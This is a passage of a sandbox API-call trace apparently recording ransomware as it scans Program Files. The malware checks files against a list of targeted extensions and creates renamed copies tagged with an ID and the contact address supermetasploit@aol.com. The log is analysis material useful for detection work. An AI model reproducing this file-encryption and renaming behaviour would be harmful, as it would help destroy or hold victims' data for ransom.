[0321.824] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0321.824] lstrlenW (lpString=".docx") returned 5 [0321.824] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0321.824] lstrlenW (lpString=".pdf") returned 4 [0321.824] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0321.824] lstrlenW (lpString=".xls") returned 4 [0321.824] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0321.825] lstrlenW (lpString=".xlsx") returned 5 [0321.825] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0321.825] lstrlenW (lpString=".ppt") returned 4 [0321.825] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0321.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.825] lstrlenW (lpString=".zip") returned 4 [0321.825] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0321.825] lstrlenW (lpString=".rar") returned 4 [0321.825] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0321.826] lstrlenW (lpString=".bz2") returned 4 [0321.826] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0321.826] lstrlenW (lpString=".7z") returned 3 [0321.826] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0321.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.826] lstrlenW (lpString=".dbf") returned 4 [0321.826] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0321.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.826] lstrlenW (lpString=".1cd") returned 4 [0321.826] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0321.826] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0321.826] lstrlenW (lpString=".jpg") returned 4 [0321.826] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0321.827] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0321.827] lstrlenW (lpString="DD01163_.WMF") returned 12 [0321.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0321.864] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=2300) returned 1 [0321.864] CloseHandle (hObject=0x53c) returned 1 [0321.864] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf")) returned 0x220 [0321.866] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0321.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0321.868] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.868] SetFilePointerEx (in: hFile=0x53c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0321.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01163_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01163_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x488 [0321.869] GetLastError () returned 0x0 [0321.869] ReadFile (hFile=0x53c, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0) Thread: id = 40 os_tid = 0xdfc [0280.347] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x51b7f8 [0280.348] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x52b800 [0280.348] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc120 [0280.348] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b718 [0280.348] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc390 [0280.348] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x3115020 [0280.352] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc270 [0280.352] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc270, Size=0x20) returned 0x4add18 [0280.352] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc1e0 [0280.352] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc1e0, Size=0x20) returned 0x4adc28 [0280.352] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0280.352] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0280.352] Wow64DisableWow64FsRedirection (in: OldValue=0x2c0ff50 | out: OldValue=0x2c0ff50*=0x0) returned 1 [0280.352] lstrlenW (lpString="kernel32.dll") returned 12 [0280.352] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4add18 | out: hHeap=0x470000) returned 1 [0280.353] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0280.353] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adc28 | out: hHeap=0x470000) returned 1 [0280.353] Sleep (dwMilliseconds=0x64) [0283.208] Sleep (dwMilliseconds=0x64) [0283.510] Sleep (dwMilliseconds=0x64) [0283.791] Sleep (dwMilliseconds=0x64) [0284.039] Sleep (dwMilliseconds=0x64) [0284.308] Sleep (dwMilliseconds=0x64) [0284.480] Sleep (dwMilliseconds=0x64) [0284.825] Sleep (dwMilliseconds=0x64) [0285.071] Sleep (dwMilliseconds=0x64) [0285.384] Sleep (dwMilliseconds=0x64) [0285.702] Sleep (dwMilliseconds=0x64) [0285.966] Sleep (dwMilliseconds=0x64) [0286.273] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0286.273] lstrlenW (lpString="Alphabet.xml") returned 12 [0286.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0286.644] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=791421) returned 1 [0286.644] CloseHandle (hObject=0x3f4) returned 1 [0286.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0286.644] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.644] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.645] lstrlenW (lpString=".doc") returned 4 [0286.645] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0286.645] lstrlenW (lpString=".docx") returned 5 [0286.645] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0286.645] lstrlenW (lpString=".pdf") returned 4 [0286.645] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0286.645] lstrlenW (lpString=".xls") returned 4 [0286.645] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0286.645] lstrlenW (lpString=".xlsx") returned 5 [0286.645] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0286.645] lstrlenW (lpString=".ppt") returned 4 [0286.645] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0286.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.645] lstrlenW (lpString=".zip") returned 4 [0286.645] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0286.645] lstrlenW (lpString=".rar") returned 4 [0286.645] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0286.645] lstrlenW (lpString=".bz2") returned 4 [0286.645] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0286.645] lstrlenW (lpString=".7z") returned 3 [0286.645] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0286.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.646] lstrlenW (lpString=".dbf") returned 4 [0286.646] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0286.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.646] lstrlenW (lpString=".1cd") returned 4 [0286.646] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0286.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.646] lstrlenW (lpString=".jpg") returned 4 [0286.646] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0286.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.646] lstrlenW (lpString=".doc") returned 4 [0286.646] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0286.646] lstrlenW (lpString=".docx") returned 5 [0286.646] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0286.646] lstrlenW (lpString=".pdf") returned 4 [0286.646] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0286.646] lstrlenW (lpString=".xls") returned 4 [0286.646] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0286.646] lstrlenW (lpString=".xlsx") returned 5 [0286.646] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0286.646] lstrlenW (lpString=".ppt") returned 4 [0286.647] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0286.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.647] lstrlenW (lpString=".zip") returned 4 [0286.647] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0286.647] lstrlenW (lpString=".rar") returned 4 [0286.647] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0286.647] lstrlenW (lpString=".bz2") returned 4 [0286.647] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0286.647] lstrlenW (lpString=".7z") returned 3 [0286.647] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0286.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.647] lstrlenW (lpString=".dbf") returned 4 [0286.647] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0286.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.647] lstrlenW (lpString=".1cd") returned 4 [0286.648] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0286.648] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0286.648] lstrlenW (lpString=".jpg") returned 4 [0286.648] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0286.648] Sleep (dwMilliseconds=0x64) [0287.483] Sleep (dwMilliseconds=0x64) [0287.668] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0287.668] lstrlenW (lpString="Content.xml") returned 11 [0287.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0287.828] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=27045) returned 1 [0287.828] CloseHandle (hObject=0x420) returned 1 [0287.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml")) returned 0x20 [0287.828] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.834] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.834] lstrlenW (lpString=".doc") returned 4 [0287.834] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.834] lstrlenW (lpString=".docx") returned 5 [0287.835] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0287.835] lstrlenW (lpString=".pdf") returned 4 [0287.835] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.835] lstrlenW (lpString=".xls") returned 4 [0287.835] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.835] lstrlenW (lpString=".xlsx") returned 5 [0287.835] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0287.835] lstrlenW (lpString=".ppt") returned 4 [0287.835] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.835] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.835] lstrlenW (lpString=".zip") returned 4 [0287.835] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.835] lstrlenW (lpString=".rar") returned 4 [0287.835] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.835] lstrlenW (lpString=".bz2") returned 4 [0287.835] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.835] lstrlenW (lpString=".7z") returned 3 [0287.835] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.836] lstrlenW (lpString=".dbf") returned 4 [0287.836] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.836] lstrlenW (lpString=".1cd") returned 4 [0287.836] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.836] lstrlenW (lpString=".jpg") returned 4 [0287.836] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.836] lstrlenW (lpString=".doc") returned 4 [0287.836] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0287.836] lstrlenW (lpString=".docx") returned 5 [0287.836] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0287.836] lstrlenW (lpString=".pdf") returned 4 [0287.836] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0287.836] lstrlenW (lpString=".xls") returned 4 [0287.836] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0287.836] lstrlenW (lpString=".xlsx") returned 5 [0287.836] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0287.836] lstrlenW (lpString=".ppt") returned 4 [0287.836] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0287.836] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.836] lstrlenW (lpString=".zip") returned 4 [0287.836] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0287.837] lstrlenW (lpString=".rar") returned 4 [0287.837] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0287.837] lstrlenW (lpString=".bz2") returned 4 [0287.837] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0287.837] lstrlenW (lpString=".7z") returned 3 [0287.837] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0287.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.837] lstrlenW (lpString=".dbf") returned 4 [0287.837] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0287.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.837] lstrlenW (lpString=".1cd") returned 4 [0287.837] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0287.837] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml") returned 62 [0287.837] lstrlenW (lpString=".jpg") returned 4 [0287.837] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0287.837] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.837] lstrlenW (lpString="boxed-split.avi") returned 15 [0287.837] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0287.854] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=84190) returned 1 [0287.854] CloseHandle (hObject=0x434) returned 1 [0287.854] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi")) returned 0x20 [0287.854] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.855] lstrlenW (lpString=".doc") returned 4 [0287.855] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.855] lstrlenW (lpString=".docx") returned 5 [0287.855] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.855] lstrlenW (lpString=".pdf") returned 4 [0287.855] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.855] lstrlenW (lpString=".xls") returned 4 [0287.855] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.855] lstrlenW (lpString=".xlsx") returned 5 [0287.855] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.855] lstrlenW (lpString=".ppt") returned 4 [0287.855] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.855] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.855] lstrlenW (lpString=".zip") returned 4 [0287.855] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.855] lstrlenW (lpString=".rar") returned 4 [0287.855] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.855] lstrlenW (lpString=".bz2") returned 4 [0287.855] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.855] lstrlenW (lpString=".7z") returned 3 [0287.855] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.856] lstrlenW (lpString=".dbf") returned 4 [0287.856] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.856] lstrlenW (lpString=".1cd") returned 4 [0287.856] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.856] lstrlenW (lpString=".jpg") returned 4 [0287.856] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.856] lstrlenW (lpString=".doc") returned 4 [0287.856] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.856] lstrlenW (lpString=".docx") returned 5 [0287.856] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0287.856] lstrlenW (lpString=".pdf") returned 4 [0287.856] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.856] lstrlenW (lpString=".xls") returned 4 [0287.856] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.856] lstrlenW (lpString=".xlsx") returned 5 [0287.856] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0287.856] lstrlenW (lpString=".ppt") returned 4 [0287.856] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.856] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.856] lstrlenW (lpString=".zip") returned 4 [0287.856] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.857] lstrlenW (lpString=".rar") returned 4 [0287.857] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0287.857] lstrlenW (lpString=".bz2") returned 4 [0287.857] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0287.857] lstrlenW (lpString=".7z") returned 3 [0287.857] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0287.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.857] lstrlenW (lpString=".dbf") returned 4 [0287.857] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0287.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.857] lstrlenW (lpString=".1cd") returned 4 [0287.857] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0287.857] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-split.avi") returned 72 [0287.857] lstrlenW (lpString=".jpg") returned 4 [0287.857] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0287.857] lstrcmpiW (lpString1=".avi", lpString2=".MSPLT") returned -1 [0287.857] lstrlenW (lpString="join.avi") returned 8 [0287.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0287.861] GetFileSizeEx (in: hFile=0x434, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=199994) returned 1 [0287.861] CloseHandle (hObject=0x434) returned 1 [0287.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi")) returned 0x20 [0287.862] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.876] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0287.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.879] lstrlenW (lpString=".doc") returned 4 [0287.879] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0287.879] lstrlenW (lpString=".docx") returned 5 [0287.879] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0287.879] lstrlenW (lpString=".pdf") returned 4 [0287.879] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0287.879] lstrlenW (lpString=".xls") returned 4 [0287.879] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0287.879] lstrlenW (lpString=".xlsx") returned 5 [0287.879] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0287.879] lstrlenW (lpString=".ppt") returned 4 [0287.879] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0287.879] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi") returned 65 [0287.879] lstrlenW (lpString=".zip") returned 4 [0287.879] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0287.879] lstrlenW (lpString=".rar") returned 4 [0287.879] lstrcmpiW 